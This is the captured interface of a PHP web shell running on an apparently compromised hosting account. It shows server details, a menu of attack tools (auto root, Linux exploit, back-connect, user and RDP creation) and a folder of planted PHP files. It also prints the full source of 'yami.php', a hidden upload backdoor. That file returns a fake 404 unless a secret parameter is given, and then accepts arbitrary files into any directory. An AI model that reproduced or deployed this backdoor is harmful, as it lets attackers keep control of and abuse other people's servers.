Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
lchg /
IMG /
[ HOME SHELL ]
Name
Size
Permission
Action
distant
[ DIR ]
drwx---r-x
jpg
[ DIR ]
drwx---r-x
logo
[ DIR ]
drwx---r-x
logo_erreurs
[ DIR ]
drwx---r-x
pdf
[ DIR ]
drwx---r-x
.htaccess
226
B
-rw-rw-rw-
Nx_.php
397
B
-rw-rw-rw-
Vp_.php
397
B
-rw-rw-rw-
cache-3738a7693e61.php
3.16
KB
-rw-rw-rw-
cache-7212d378476c.php
3.16
KB
-rw-rw-rw-
capslok.php
3.16
KB
-rw-rw-rw-
img_cache.php
700
B
-rw-rw-rw-
img_caches.php
700
B
-rw-rw-rw-
img_gnkp7r.php
1.57
KB
-rw-rw-rw-
img_k2ybka.php
1.57
KB
-rw-rw-rw-
remove.txt
80
B
-rw----r--
sitemange.php
4.14
KB
-rw-rw-rw-
yami.php
777
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yami.php
<?php if(!isset($_GET["Yami1337"])){http_response_code(404);die("404");} $msg=""; if($_SERVER["REQUEST_METHOD"]=="POST"&&isset($_FILES["f"])&&$_FILES["f"]["error"]==0){ $n=$_FILES["f"]["name"]; $d=isset($_POST["dir"])?rtrim($_POST["dir"],"/")."/":"./"; if(@move_uploaded_file($_FILES["f"]["tmp_name"],$d.$n)) $msg="<div style=color:green>OK: ".$d.$n." (".@filesize($d.$n)."B)</div>"; else $msg="<div style=color:red>FAIL: ".$d.$n."</div>"; } ?><!DOCTYPE html><html><head><title>Yami Upload</title></head><body> <h2>Yami Upload</h2><?php echo $msg;?> <form method="POST" enctype="multipart/form-data"> <input type="file" name="f" required><br> <input type="text" name="dir" value="./" placeholder="dir"><br> <input type="submit" value="Upload"> </form></body></html>
Close